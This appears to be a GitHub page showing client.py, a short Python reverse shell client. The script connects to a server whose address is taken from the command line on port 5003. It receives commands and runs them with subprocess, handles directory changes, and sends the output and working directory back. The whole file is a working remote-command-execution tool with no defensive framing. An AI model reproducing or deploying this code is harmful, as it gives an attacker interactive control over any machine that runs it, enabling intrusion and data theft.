-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathclient.py
More file actions
58 lines (53 loc) · 1.92 KB
/
client.py
File metadata and controls
58 lines (53 loc) · 1.92 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import socket
import os
import subprocess
import sys
class Shell():
def __init__(self):
self.SERVER_HOST = sys.argv[1]
self.SERVER_PORT = 5003
self.BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
# separator string for sending 2 messages in one go
self.SEPARATOR = "<sep>"
# create the socket object
self.s = socket.socket()
def create_socket(self):
# connect to the server
self.s.connect((self.SERVER_HOST, self.SERVER_PORT))
# get the current directory
cwd = os.getcwd()
self.s.send(cwd.encode())
def command_loop(self):
while True:
# receive the command from the server
command = self.s.recv(self.BUFFER_SIZE).decode()
splited_command = command.split()
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
if splited_command[0].lower() == "cd":
# cd command, change directory
try:
os.chdir(' '.join(splited_command[1:]))
except FileNotFoundError as e:
# if there is an error, set as the output
output = str(e)
else:
# if operation is successful, empty message
output = ""
else:
# execute the command and retrieve the results
output = subprocess.getoutput(command)
# get the current working directory as output
cwd = os.getcwd()
# send the results back to the server
message = f"{output}{self.SEPARATOR}{cwd}"
self.s.send(message.encode())
# close client connection
self.s.close()
def main():
shell = Shell()
shell.create_socket()
shell.command_loop()
if __name__ == "__main__":
main()